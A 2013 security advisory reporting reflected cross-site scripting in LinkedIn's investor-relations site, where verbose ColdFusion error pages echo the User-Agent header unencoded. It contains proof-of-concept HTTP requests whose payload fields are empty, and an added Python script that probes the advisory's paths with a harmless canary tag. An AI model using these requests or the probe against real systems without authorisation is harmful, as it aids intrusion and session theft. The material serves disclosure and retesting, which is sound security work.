=============================================
INTERNET SECURITY AUDITORS ALERT 2013-006
- Original release date: 4th March 2013
- Last revised: 25th March 2013
- Discovered by: Eduardo Garcia Melia
- Severity: 4.3/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Multiple reflected XSS vulnerabilities in LinkedIn Investors.

II. BACKGROUND
-------------------------
LinkedIn is a social networking service and website (http://www.linkedin.com/) that operates the world's largest professional network on the Internet, with more than 187 million members in over 200 countries and territories.

More information: http://press.linkedin.com/about

III. DESCRIPTION
-------------------------
LinkedIn Investors (http://investors.linkedin.com) is affected by multiple reflected Cross-Site Scripting vulnerabilities. An attacker can inject HTML or script code that runs in the context of the victim's browser, and so can perform XSS attacks and steal the cookies of a targeted user.

In every case below a single quote in a numeric URL parameter (ReleaseID, eventid, historic_Year) makes the ColdFusion template fail, and the resulting verbose 500 error page echoes the request's User-Agent header in its "Browser:" field without output encoding. The script payload is therefore carried in the User-Agent header, not in the URL; the URL only serves to force the error page.

IV. PROOF OF CONCEPT
-------------------------
The injection point is the User-Agent header of the following requests:

=============== First XSS ===============

GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent:
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

=============== Second XSS ===============

GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent:
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

=============== Third XSS ===============

GET /stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'-- HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent:
Referer: http://investors.linkedin.com/stocklookup.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

=============== Fourth XSS ===============

GET /calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent:
Referer: http://investors.linkedin.com/calculator.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

RESPONSE in all cases:

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 04 Mar 2013 11:34:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

Error occurred processing request

Error Diagnostic

Element RESULT.TITLE is undefined in RELEASEDETAIL.
The error occurred on line 175. Date/Time: Mon Mar 04 06:34:48 EST 2013
Browser:
Remote Address: 192.168.149.88
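As an added example (written for this page, not part of the advisory and not Internet Security Auditors' tooling), the following Python script reproduces the check behind the proof of concept. It sends a harmless canary in the User-Agent header, as the requests above do, and classifies the reply into three outcomes: the canary comes back byte-for-byte (the vulnerable case), the token comes back but the tag was encoded or filtered (what a fix should produce), or nothing is reflected. It also flags the verbose ColdFusion "Error Diagnostic" page and the line number it leaks. The request paths are the advisory's own; the sample error page, the token value and the xsscanary tag are constructed for the example.

```python
import html
import http.client
import re
import uuid
from dataclasses import dataclass
from typing import Optional

# The four request paths from the advisory: a single quote in a numeric
# parameter is what provokes the verbose ColdFusion error page.
ADVISORY_PATHS = [
    "/releasedetail.cfm?ReleaseID=738977'",
    "/eventdetail.cfm?eventid=124442'--",
    "/stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'--",
    "/calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs"
    "&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate",
]

ERROR_LINE_RE = re.compile(r"The error occurred on line (\d+)")


def make_canary(token: str) -> str:
    """Harmless but unambiguous marker: closes an attribute and opens a bogus
    tag, so raw reflection is visible without executing anything."""
    return f'"><xsscanary id="{token}">'


@dataclass
class Finding:
    status: int
    reflected_raw: bool          # canary echoed byte-for-byte: XSS
    reflected_transformed: bool  # token present but tag altered (encoded/filtered)
    verbose_error: bool          # ColdFusion "Error Diagnostic" page on a 500
    error_line: Optional[int]    # line number leaked by that page, if any


def analyse(status: int, body: str, token: str) -> Finding:
    """Classify one response body against the canary built from `token`."""
    canary = make_canary(token)
    raw = canary in body
    transformed = (not raw) and token in body
    verbose = status == 500 and "Error Diagnostic" in body
    m = ERROR_LINE_RE.search(body)
    return Finding(status, raw, transformed, verbose, int(m.group(1)) if m else None)


def probe(host: str, path: str, token: Optional[str] = None) -> Finding:
    """Live check (needs network and authorisation): send the canary as the
    User-Agent, exactly as the advisory's requests do, and classify the reply."""
    token = token or uuid.uuid4().hex[:8]
    conn = http.client.HTTPConnection(host, timeout=10)
    try:
        conn.request("GET", path, headers={"User-Agent": make_canary(token),
                                           "Accept": "text/html"})
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
        return analyse(resp.status, body, token)
    finally:
        conn.close()


# Constructed sample page modelled on the advisory's 500 response (not captured
# traffic). The "Browser:" field is where the User-Agent value is echoed.
def sample_error_page(browser_field: str) -> str:
    return (
        "Error occurred processing request\n\nError Diagnostic\n\n"
        "Element RESULT.TITLE is undefined in RELEASEDETAIL.\n"
        "The error occurred on line 175. Date/Time: Mon Mar 04 06:34:48 EST 2013\n"
        f"Browser: {browser_field}\n"
        "Remote Address: 192.168.149.88\n"
    )


def vulnerable_page(token: str) -> str:
    # User-Agent echoed verbatim: the advisory's situation.
    return sample_error_page(make_canary(token))


def fixed_page(token: str) -> str:
    # User-Agent HTML-encoded before output: what a fix should look like.
    return sample_error_page(html.escape(make_canary(token), quote=True))


if __name__ == "__main__":
    t = "c0ffee42"  # constructed token
    for label, page in (("vulnerable", vulnerable_page(t)), ("fixed", fixed_page(t))):
        print(label, analyse(500, page, t))
    # Live use, only against a host you are authorised to test:
    # for p in ADVISORY_PATHS:
    #     print(p, probe("investors.linkedin.com", p))
```

The canary deliberately contains no script: a raw echo of the closing quote and the bogus tag is already proof of missing output encoding, and the distinction between "raw" and "transformed" is what tells a retest that a fix actually encodes the header rather than merely returning a different page.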
V. BUSINESS IMPACT
-------------------------
A malicious user could use this flaw to send phishing messages to LinkedIn customers, abusing the users' trust in the LinkedIn portal. The user could be forwarded to a LinkedIn clone site that steals credentials, to a malicious site hosting malware, and so on.

Two points qualify this impact. The injection point is a request header, so the victim's browser has to be made to send the payload as its User-Agent, which a plain link cannot do; practical exploitation is therefore harder than for a reflection in a URL parameter. Independently of the XSS, the verbose error page discloses the failing template, the line number and the server stack (IIS 6.0, ASP.NET, ColdFusion), which helps an attacker map the application.

VI. SYSTEMS AFFECTED
-------------------------
The vulnerability affects LinkedIn Investors: http://investors.linkedin.com

VII. SOLUTION
-------------------------
Corrected by vendor.

VIII. REFERENCES
-------------------------
http://investors.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)

IX. CREDITS
-------------------------
These vulnerabilities have been discovered by Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 04, 2013: Initial release
March 10, 2013: Second release

XI. DISCLOSURE TIMELINE
-------------------------
March 04, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 10, 2013: Sent to Sec Team.
March 25, 2013: Request for update. Response that it had already been corrected. Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain-based leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ICT, etc. We are a vendor-independent provider with deep expertise since 2001.

Our efforts in R&D include vulnerability research, open security project collaboration, whitepapers, presentations, and security event participation and promotion. For further information regarding our security services, contact us.

XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors